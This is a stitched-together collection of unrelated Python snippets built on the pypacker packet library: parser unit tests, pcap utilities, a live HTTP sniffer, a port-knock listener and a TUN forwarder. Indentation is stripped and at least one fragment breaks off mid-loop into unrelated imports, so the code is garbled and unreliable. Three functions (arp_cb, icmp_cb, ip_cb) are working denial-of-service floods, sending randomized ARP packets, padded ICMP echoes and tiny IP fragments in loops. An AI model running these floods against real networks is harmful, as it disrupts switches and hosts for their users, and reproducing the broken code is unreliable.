def arp_cb(pargs):
"""ARP DoS, eg for switches"""
#logger.debug("%s %s %s %s", pargs.mac_src, pargs.mac_dst, pargs.ip_src, pargs.ip_dst)
pkt_arp_req = ethernet.Ethernet(dst=b"\xFF" * 6, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha=b"\xFF" * 6, tpa_s=pargs.ip_dst,
op=arp.ARP_OP_REQUEST)
pkt_arp_resp = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src, type=ethernet.ETH_TYPE_ARP) + \
arp.ARP(sha_s=pargs.mac_src, spa_s=pargs.ip_src, tha_s=pargs.mac_dst, tpa_s=pargs.ip_dst,
op=arp.ARP_OP_REPLY)
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
for cnt in range(pargs.count):
# request from various sources
mac = pypacker.get_rnd_mac()
pkt_arp_req.src = mac
pkt_arp_req.arp.sha = mac
pkt_arp_req.arp.spa = pypacker.get_rnd_ipv4()
psock.send(pkt_arp_req.bin())
# response from various sources
mac = pypacker.get_rnd_mac()
pkt_arp_resp.src = mac
pkt_arp_resp.arp.sha = mac
pkt_arp_resp.arp.spa = pypacker.get_rnd_ipv4()
psock.send(pkt_arp_resp.bin())
psock.close()
def test_icmp_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
icmp_echo_type = 8
bpf_filter = "ip"
display_filter = "icmp"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"icmp.type": icmp_echo_type,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip, p=ip.IP_PROTO_ICMP)
+ icmp.ICMP(type=icmp_echo_type)
+ icmp.ICMP.Echo()
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def tcp_packet(tcp_payload) -> bytes:
packet = (
ethernet.Ethernet(src_s="00:00:00:12:34:ff", dst_s="00:00:00:ff:00:1e")
+ ip.IP(src_s="10.0.0.255", dst_s="21.53.78.255") + tcp.TCP(
sport=16424, dport=41799, flags=tcp.TH_ACK,
body_bytes=tcp_payload))
return packet.bin()
def test_tcp_packet_filter_and_parse_with_field_template_with_non_existing_field_first(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
bpf_filter = "ip"
display_filter = "tcp"
field_templates = {"macro.ip.src": ["ipv6.src", "ip.src"]}
expected_output = {
"macro.ip.src": src_ip,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=field_templates,
expected_passed=True,
expected_output=expected_output,
)
def test_filter_and_parse_without_filters(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=None,
display_filter=None,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def test_arp_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
broadcast_mac = "ff:ff:ff:ff:ff:ff"
src_ip = "21.53.78.255"
target_ip = "10.0.0.255"
bpf_filter = "arp"
display_filter = "arp"
expected_output = {
"eth.src": src_mac,
"eth.dst": broadcast_mac,
"arp.src.hw_mac": src_mac,
"arp.src.proto_ipv4": src_ip,
"arp.dst.hw_mac": broadcast_mac,
"arp.dst.proto_ipv4": target_ip,
}
packet = ethernet.Ethernet(src_s=src_mac, dst_s=broadcast_mac) + arp.ARP(
sha_s=src_mac, spa_s=src_ip, tha_s=broadcast_mac, tpa_s=target_ip
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def pcap_to_object(pcap_file, obj_file):
"""Create a Python serialized graph object.
Read the pcap file given in parameter, extracts source and destination IP
and write a serialized graph object.
"""
dic_ip = ip_dict()
reader = ppcap.Reader(filename=pcap_file)
if options.verbose:
print("Reading pcap file...")
for ts, buf in reader:
eth = ethernet.Ethernet(buf)
if eth[ip.IP] is not None:
# print("%d: %s:%s -> %s:%s" % (ts, eth[ip.IP].src_s,
# eth[tcp.TCP].sport, eth[ip.IP].dst_s,
# eth[tcp.TCP].dport))
dic_ip[eth[ip.IP].src_s][eth[ip.IP].dst_s] += 1
if options.verbose:
print("Serialization...")
dic_obj = open(obj_file, "wb")
pickle.dump(dic_ip, dic_obj)
dic_obj.close()
def buildtcp():
# Ethernet header
eth = ethernet.Ethernet()
eth.src = b"\x00\x0c\x29\xdf\xe3\xc0"
eth.dst = b"\x00\x0c\x29\x29\x85\xd2"
eth.type = ethernet.ETH_TYPE_IP
# IP header
ipp = ip.IP()
ipp.src = socket.inet_aton("172.16.13.165")
ipp.dst = socket.inet_aton("172.16.13.162")
ipp.p = ip.IP_PROTO_TCP
# TCP header
tcpp = tcp.TCP()
tcpp.sport = 60001
tcpp.dport = 80
tcpp.flags = tcp.TH_SYN
ipp.data = tcpp
ipp.len = len(str(ip))
ipp.id = 1
tcpp._TCP__calc_sum()
ipp._IP__calc_sum()
eth.data = ipp
# open sockets using the socket handler
#sock_l2 = SocketHndl(iface_name="eth1", mode=SocketHndl.MODE_LAYER_2)
# send raw bytes
#sock_l2.send(eth.bin())
#print(eth.bin())
return eth.bin()
def extract(filename, cnt=1000):
bts_l = get_pcap(filename, cnt)
pkts = [ethernet.Ethernet(bts) for bts in bts_l]
pkts_tcp = [pkt.upper_layer.upper_layer for pkt in pkts]
print("tcp packets: {}".format(len(pkts_tcp)))
# mmartin: Works, just noisy
#for pkt in pkts_tcp:
# print("%d %d <-> %d %d" % (pkt.sport, pkt.seq, pkt.dport, pkt.ack))
# mmartin: When the 0th packet is chosen, this returns the first few HTTP exchanges. This is the same as one of the files output by tcpflow.
tcp_start = pkts_tcp[0]
# mmartin: This returns the Javascript segments w/ some errors
#tcp_start = pkts_tcp[20]
tcp_start.ra_collect(pkts_tcp)
segments_cnt = len(tcp_start.ra_segments)
segments_ra = tcp_start.ra_bin()
print('segment count:\n\n{}'.format(segments_cnt))
print('number of packets:\n\n{}'.format(len(pkts_tcp)))
print('ra_segments:\n\n{}'.format(tcp_start.ra_segments))
print('segments_ra:\n\n{}'.format(segments_ra.decode('ISO-8859-1')))
return segments_ra
def main():
#override some warning settings in pypacker. May need to change this to .CRITICAL in the future, but for now we're trying .ERROR
#without this when parsing http for example we get "WARNINGS" when packets aren't quite right in the header.
logger = pypacker.logging.getLogger("pypacker")
pypacker.logger.setLevel(pypacker.logging.ERROR)
counter = 0
startTime = time.time()
print('listening on interface {}'.format(interface))
try:
preader = pcapy.open_live(interface, 65536, False, 1)
preader.setfilter('tcp port 80 or tcp port 443')
except Exception as e:
print(e, end='\n', flush=True)
sys.exit(1)
while True:
try:
counter = counter + 1
(header, buf) = preader.next()
ts = header.getts()[0]
tcpPacket = False
pkt = None
layer = None
# try to determine what type of packets we have, there is the chance that 0x800
# may be in the spot we're checking, may want to add better testing in future
eth = ethernet.Ethernet(buf)
if hex(eth.type) == '0x800':
layer = 'eth'
pkt = eth
if (eth[ethernet.Ethernet, ip.IP, tcp.TCP] is not None):
tcpPacket = True
lcc = linuxcc.LinuxCC(buf)
if hex(lcc.type) == '0x800':
layer = 'lcc'
pkt = lcc
if (lcc[linuxcc.LinuxCC, ip.IP, tcp.TCP] is not None):
tcpPacket = True
if tcpPacket and pkt and layer:
tcpProcess(pkt, layer, ts)
except (KeyboardInterrupt, SystemExit):
raise
except Exception as e:
error_string = traceback.format_exc()
print(str(error_string))
endTime = time.time()
totalTime = endTime - startTime
if verbose:
print ('Total Time: %s, Total Packets: %s, Packets/s: %s' % (totalTime, counter, counter / totalTime ))
def remove_flags(input, nflags=5):
output = f'{input}_tmp'
writer = ppcap.Writer(filename=output)
try:
reader = pcap.pcap(input)
for timestamp, raw in reader:
try:
pkt = ethernet.Ethernet(raw)
if pkt[ip.IP] is not None:
ip_body = pkt[ip.IP]
if ip_body[tcp.TCP] is not None:
tcp_body = ip_body[tcp.TCP]
print(tcp_body.flags)
flags = decode_tcp_flags_value(tcp_body.flags,
nflags)[::-1]
flags = int(''.join([str(i) for i in flags]), 2)
print(flags)
pkt[ip.IP][tcp.TCP].flags = flags
writer.write(pkt.bin(), ts=timestamp * 1e9)
except Exception as e:
print(e)
except Exception as e:
print(e)
writer.close()
shutil.copyfile(output, input)
os.remove(output)
def _generate_zero_pkt(self, src_ip, src_port, dst_ip, dst_port, proto):
assert proto == 6
zp = ethernet.Ethernet() + ip.IP(src_s=src_ip, dst_s=dst_ip) + tcp.TCP(
sport=src_port,
dport=dst_port,
flags=24,
body_bytes=bytearray(self.zpp))
return zp.bin()
def split_by_label(input, labeler, meta_fpath, nulify_dscp=True):
# meta
try:
with open(meta_fpath, 'r') as jf:
meta = json.load(jf)
if 'labels' not in meta.keys():
meta['labels'] = []
except:
meta = {'labels': []}
# read and write
labels = []
pwriters = []
try:
reader = pcap.pcap(input)
for ts, raw in reader:
eth = ethernet.Ethernet(raw)
if eth[ethernet.Ethernet, ip.IP] is not None:
src = eth[ip.IP].src_s
dst = eth[ip.IP].dst_s
if eth[tcp.TCP] is not None:
sport = eth[tcp.TCP].sport
dport = eth[tcp.TCP].dport
elif eth[udp.UDP] is not None:
sport = eth[udp.UDP].sport
dport = eth[udp.UDP].dport
else:
sport = 0
dport = 0
label, description = labeler(ts, src, dst, sport, dport)
if label in labels:
idx = labels.index(label)
else:
labels.append(label)
pwriters.append(
ppcap.Writer(filename=f'{input}_label:{label}'))
idx = -1
if nulify_dscp:
eth[ip.IP].tos = 0
pwriters[idx].write(eth.bin(), ts=ts * 1e9)
except Exception as e:
print(e)
os.remove(input)
for pwriter in pwriters:
pwriter.close()
meta['labels'] += labels
meta['labels'] = np.unique(meta['labels']).tolist()
with open(meta_fpath, 'w') as jf:
json.dump(meta, jf)
def _create_udp_base_packets(
conversation: Layer3Conversation) -> Tuple[Packet, Packet]:
src_port, dst_port = _generate_port(), _generate_port()
base_src_to_dst = (ethernet.Ethernet(
src_s=conversation.src_mac,
dst_s=conversation.dst_mac,
type=ethernet.ETH_TYPE_IP,
) + ip.IP(p=ip.IP_PROTO_UDP,
src_s=conversation.src_ip,
dst_s=conversation.dst_ip) +
udp.UDP(sport=src_port, dport=dst_port))
base_dst_to_src = (ethernet.Ethernet(
src_s=conversation.dst_mac,
dst_s=conversation.src_mac,
type=ethernet.ETH_TYPE_IP,
) + ip.IP(p=ip.IP_PROTO_UDP,
src_s=conversation.dst_ip,
dst_s=conversation.src_ip) +
udp.UDP(sport=dst_port, dport=src_port))
return base_src_to_dst, base_dst_to_src
def icmp_cb(pargs):
"""ICMP DoS"""
pkt_icmpreq = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src) +\
ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst, p=ip.IP_PROTO_ICMP) +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"A" * 1460)
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
for cnt in range(pargs.count):
psock.send(pkt_icmpreq.bin())
psock.close()
def test_dhcp_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
given_ip = "10.0.0.255"
broadcast_ip = "255.255.255.255"
src_port = 16424
dst_port = 68
bpf_filter = "ip"
display_filter = "dhcp"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": broadcast_ip,
"udp.srcport": src_port,
"udp.dstport": dst_port,
"dhcp.ip.your": given_ip,
"dhcp.option.dhcp_server_id": src_ip,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=broadcast_ip, p=ip.IP_PROTO_UDP)
+ udp.UDP(sport=src_port, dport=dst_port)
+ dhcp.DHCP(
yiaddr_s=given_ip,
magic=dhcp.DHCP_MAGIC,
opts=[
dhcp.DHCPOpt(
type=dhcp.DHCP_OPT_SERVER_ID,
len=4,
body_bytes=bytes(int(num) for num in src_ip.split(".")),
)
],
)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def ip_cb(pargs):
"""
IP fragment DOS
"""
eth_l = ethernet.Ethernet(dst_s=pargs.mac_dst, src_s=pargs.mac_src)
ip_l = ip.IP(src_s=pargs.ip_src, dst_s=pargs.ip_dst)
ip_l.body_bytes = b"A" * 4000
psock = psocket.SocketHndl(iface_name=pargs.iface_name)
ip_frags = ip_l.create_fragments(fragment_len=8)
for cnt in range(pargs.count):
for ip_frag in ip_frags:
eth_l.upper_layer = ip_frag
psock.send(eth_l.bin())
psock.close()
def read_pkt(raw, read_ip_proto=True):
id = None
features = None
flags = None
tos = None
try:
pkt = ethernet.Ethernet(raw)
if pkt[ip.IP] is not None:
frame_size = len(raw)
src_ip, dst_ip, src_port, dst_port, proto, header_size, payload_size, flags, window, tos = read_ip_pkt(
pkt[ip.IP], read_proto=read_ip_proto)
id = [src_ip, src_port, dst_ip, dst_port, proto]
features = [frame_size, header_size, payload_size, window]
flags = [int(item) for item in flags.split(',')]
except Exception as e:
print(e)
return id, features, flags, pkt, tos
def test_http_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 80
http_type = "GET"
uri = "/subtest/subsubtest"
version = "HTTP/1.1"
domain_name = "www.testwebsite.com"
body = "random body \x09\xff\x00"
bpf_filter = "ip"
display_filter = "http"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
"http.request.method": http_type,
"http.request.uri": uri,
"http.request.version": version,
"http.host": domain_name,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
+ http.HTTP(
f"{http_type} {uri} {version}\r\nHost: {domain_name}\r\n\r\n{body}\r\n".encode()
)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
def _listen_cycler(obj, sock):
logger.debug("starting listen cycler")
while obj._state_active:
try:
bts = sock.recv()
pkt = ethernet.Ethernet(bts)
if obj._trigger_strategy_active is not None and\
(time_now() - obj._time_last_match) > obj._timeout_reset_sec:
KnockLogic._reset_condition(obj)
# initial state or reset
if obj._trigger_strategy_active is None:
for cond_idx, strategy in enumerate(obj._trigger_strategies):
if strategy[0](pkt):
logger.info("found initial matching condition at strategy index %d" % cond_idx)
obj._state_idx = 1
obj._trigger_strategy_active = strategy
obj._time_last_match = time_now()
break
# some condition matched before
elif obj._trigger_strategy_active[obj._state_idx](pkt):
logger.info("state %d/%d matched" %
(obj._state_idx + 1, len(obj._trigger_strategy_active)-1))
obj._state_idx += 1
obj._time_last_match = time_now()
if obj._trigger_strategy_active is None:
continue
# -1 because last element is action callback
if obj._state_idx >= len(obj._trigger_strategy_active) - 1:
logger.info("triggering action!")
obj._trigger_strategy_active[-1](pkt)
KnockLogic._reset_condition(obj)
except socket.timeout:
# try next packet
logger.debug("timeout...")
except OSError:
break
except AttributeError:
pass
except Exception as ex:
logger.debug("exception while parsing: %r" % ex)
def test_capture(self):
port = self.xm.session.reserve_ports([self.port1])[self.port1]
port.load_config(
path.join(path.dirname(__file__), 'configs',
'test_config_loopback.xpc'))
port.streams[0].set_attributes(ps_ratepps=10, ps_packetlimit=80)
port.remove_stream(1)
port.start_capture()
port.start_traffic(blocking=True)
port.stop_capture()
packets = port.capture.get_packets(0,
1,
cap_type=XenaCaptureBufferType.raw)
assert (len(packets) == 1)
port.capture.packets[0].get_attributes()
packet = ethernet.Ethernet(binascii.unhexlify(packets[0]))
assert (packet.ip.dst_s == '1.1.0.0')
packets = port.capture.get_packets(10,
20,
cap_type=XenaCaptureBufferType.raw)
print(packets[0])
assert (len(packets) == 10)
packets = port.capture.get_packets(
file_name=path.join(self.temp_dir, 'xena_cap.txt'))
print(packets[0])
assert (len(packets) == 80)
tshark = Tshark(self.config.get('General', 'wireshark_dir'))
packets = port.capture.get_packets(cap_type=XenaCaptureBufferType.pcap,
file_name=path.join(
self.temp_dir, 'xena_cap.pcap'),
tshark=tshark)
analyser = TsharkAnalyzer()
analyser.add_field('ip.src')
analyser.add_field('ip.dst')
fields = tshark.analyze(path.join(self.temp_dir, 'xena_cap.pcap'),
analyser)
print(fields)
assert (len(fields) == 80)
def packetType(buf):
tcpPacket = False
dhcpPacket = False
httpPacket = False
udpPacket = False
sslPacket = False
#try to determine what type of packets we have, there is the chance that 0x800 may be in the spot we're checking, may want to add better testing in future
eth = ethernet.Ethernet(buf)
if hex(eth.type) == '0x800':
layer = 'eth'
pkt = eth
if (eth[ethernet.Ethernet, ip.IP, tcp.TCP] is not None):
tcpPacket = True
if (eth[ethernet.Ethernet, ip.IP, udp.UDP, dhcp.DHCP] is not None):
dhcpPacket = True
if (eth[ethernet.Ethernet, ip.IP, tcp.TCP, http.HTTP] is not None):
httpPacket = True
if (eth[ethernet.Ethernet, ip.IP, udp.UDP] is not None):
udpPacket = True
if (eth[ethernet.Ethernet, ip.IP, tcp.TCP, ssl.SSL] is not None):
sslPacket = True
lcc = linuxcc.LinuxCC(buf)
if hex(lcc.type) == '0x800':
layer = 'lcc'
pkt = lcc
if (lcc[linuxcc.LinuxCC, ip.IP, tcp.TCP] is not None):
tcpPacket = True
if (lcc[linuxcc.LinuxCC, ip.IP, udp.UDP, dhcp.DHCP] is not None):
dhcpPacket = True
if (lcc[linuxcc.LinuxCC, ip.IP, tcp.TCP, http.HTTP] is not None):
httpPacket = True
if (lcc[linuxcc.LinuxCC, ip.IP, udp.UDP] is not None):
udpPacket = True
if (lcc[linuxcc.LinuxCC, ip.IP, tcp.TCP, ssl.SSL] is not None):
sslPacket = True
return (pkt, layer, tcpPacket, dhcpPacket, httpPacket, udpPacket,
sslPacket)
def read_write_cycler(obj, iface_in, iface_out, name):
while obj._state_active:
try:
bts = iface_in.read()
try:
ip.IP(
bts
) if obj._ifacetype == TYPE_TUN else ethernet.Ethernet(bts)
#logger.debug("Sending in cycler %s (%s -> %s):\n%s\n%s" %
# (name, iface_in._iface_name, iface_out._iface_name, bts, pkt))
iface_out.write(bts)
except:
pass
except ValueError as ex:
logger.exception(ex)
break
except OSError as ex:
logger.exception(ex)
break
except Exception as ex:
logger.exception(ex)
break
def pass_or_dump(bts, pcap_writer):
try:
eth = ethernet.Ethernet(bts)
if bts != eth.bin():
raise Exception("parsing was buggy: %r != %r" % (bts, eth.bin()))
tmp = "%r" % eth
#print(bts)
#print("%r" % eth)
#print(">>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>")
print(".", end="")
print("%r" % eth.highest_layer.__class__.__name__, end="")
sys.stdout.flush()
for layer in eth:
if layer.dissect_error:
raise Exception("parsing was buggy: %r != %r" %
(bts, eth.bin()))
except Exception as ex:
print("\nError while parsing: %r" % ex)
pcap_writer.write(bts)
def test_dns_packet_filter_and_parse(marine_or_marine_pool: Union[Marine, MarinePool]):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 53
bpf_filter = "ip"
display_filter = "dns"
domain_name = "www.testwebsite.com"
expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"ip.src": src_ip,
"ip.dst": dst_ip,
"udp.srcport": src_port,
"udp.dstport": dst_port,
"dns.qry.name": domain_name,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip, p=ip.IP_PROTO_UDP)
+ udp.UDP(sport=src_port, dport=dst_port)
+ dns.DNS(queries=[dns.DNS.Query(name_s=domain_name, type=1, cls=1)])
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=None,
expected_passed=True,
expected_output=expected_output,
)
from pypacker import psocket from pypacker.layer12 import ethernet from pypacker.layer3 import ip, icmp # send ICMP request psock = psocket.SocketHndl(iface_name="wlan0") icmpreq = ethernet.Ethernet(src_s="20:16:d8:ef:1f:49", dst_s="24:65:11:85:e9:00", type=ethernet.ETH_TYPE_IP) +\ ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.178.27", dst_s="192.168.178.24") +\ icmp.ICMP(type=8) +\ icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890") psock.send(icmpreq.bin())
pcapwriter = ppcap.Writer(filename="parsefail.pcap")
raw_bytes = b""
cnt = 0
time_start = time.time()
for bts in sockhndl:
if cnt % 1000 == 0:
print("%d pps" % (cnt / (time.time() - time_start)))
time_start = time.time()
cnt = 0
cnt += 1
try:
#pkt = radiotap.Radiotap(bts)
pkt = ethernet.Ethernet(bts)
# print(pkt)
# print(pkt.body_handler)
"""
if pkt[ip.IP] is not None:
tmp = pkt[ip.IP].src_s
tmp = pkt[ip.IP].dst_s
tmp = pkt[ip.IP].body_handler.body_handler
"""
pkt.dissect_full()
raw_bytes = pkt.bin()
#print("%r" % pkt)
# pcapwriter.write(raw_bytes)
for layer in pkt:
import socket
import pypacker.pypacker as pypacker
from pypacker.pypacker import Packet
from pypacker import psocket
from pypacker.layer12 import arp, ethernet, ieee80211, prism
from pypacker.layer3 import ip, icmp
psock = psocket.SocketHndl(iface_name="lo0",
mode=psocket.SocketHndl.MODE_LAYER_2,
timeout=10)
# send ARP request
arpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", type=ethernet.ETH_TYPE_ARP) +\
arp.ARP(sha_s="12:34:56:78:90:12", spa_s="192.168.0.2",
tha_s="12:34:56:78:90:13", tpa_s="192.168.0.1")
psock.send(arpreq.bin())
# send ICMP request
icmpreq = ethernet.Ethernet(src_s="12:34:56:78:90:12", dst_s="12:34:56:78:90:13", type=ethernet.ETH_TYPE_IP) +\
ip.IP(p=ip.IP_PROTO_ICMP, src_s="192.168.0.2", dst_s="192.168.0.1") +\
icmp.ICMP(type=8) +\
icmp.ICMP.Echo(id=1, ts=123456789, body_bytes=b"12345678901234567890")
psock.send(icmpreq.bin())
#print(dir(preader))
def handle_packet(o, src_ip, src_port, dst_ip, dst_port):
if not (o[ip.IP].src_s == src_ip and o[udp.UDP].sport == src_port
and o[ip.IP].dst_s == dst_ip and o[udp.UDP].dport == dst_port):
return
r = rtp.RTP(o[udp.UDP].body_bytes)
print("%d: pt=%s ts=%s seqnum=%s" % (ts, r.pt, r.ts, r.seq))
sys.stdout.write("payload: ")
for b in r.body_bytes:
sys.stdout.write(hex(b) + " ")
print("")
for ts, buf in preader:
eth = ethernet.Ethernet(buf)
if eth[ethernet.Ethernet, ip.IP, udp.UDP] is not None:
#print("found eth")
handle_packet(eth, src_ip, src_port, dst_ip, dst_port)
continue
lcc = linuxcc.LinuxCC(buf)
if lcc[linuxcc.LinuxCC, ip.IP, udp.UDP] is not None:
#print("found lcc")
handle_packet(lcc, src_ip, src_port, dst_ip, dst_port)
continue
def test_tcp_packet_filter_and_parse_with_multiple_different_field_templates(
marine_or_marine_pool: Union[Marine, MarinePool]
):
src_mac = "00:00:00:12:34:ff"
dst_mac = "00:00:00:ff:00:1e"
src_ip = "21.53.78.255"
dst_ip = "10.0.0.255"
src_port = 16424
dst_port = 41799
bpf_filter = "ip"
display_filter = "tcp"
first_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
}
second_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
"macro.srcport": ["tcp.srcport", "udp.srcport"],
"macro.dstport": ["tcp.dstport", "udp.dstport"],
}
third_field_templates = {
"macro.ip.src": ["ip.src", "ipv6.src"],
"macro.ip.dst": ["ip.dst", "ipv6.dst"],
"macro.dstport": ["tcp.dstport", "udp.dstport"],
}
first_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"tcp.srcport": src_port,
"tcp.dstport": dst_port,
}
second_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"macro.srcport": src_port,
"macro.dstport": dst_port,
}
third_expected_output = {
"eth.src": src_mac,
"eth.dst": dst_mac,
"macro.ip.src": src_ip,
"macro.ip.dst": dst_ip,
"tcp.srcport": src_port,
"macro.dstport": dst_port,
}
packet = (
ethernet.Ethernet(src_s=src_mac, dst_s=dst_mac)
+ ip.IP(src_s=src_ip, dst_s=dst_ip)
+ tcp.TCP(sport=src_port, dport=dst_port)
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=first_field_templates,
expected_passed=True,
expected_output=first_expected_output,
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=second_field_templates,
expected_passed=True,
expected_output=second_expected_output,
)
general_filter_and_parse_test(
marine_or_marine_pool=marine_or_marine_pool,
packet=packet.bin(),
packet_encapsulation=encap_consts.ENCAP_ETHERNET,
bpf_filter=bpf_filter,
display_filter=display_filter,
field_templates=third_field_templates,
expected_passed=True,
expected_output=third_expected_output,
)
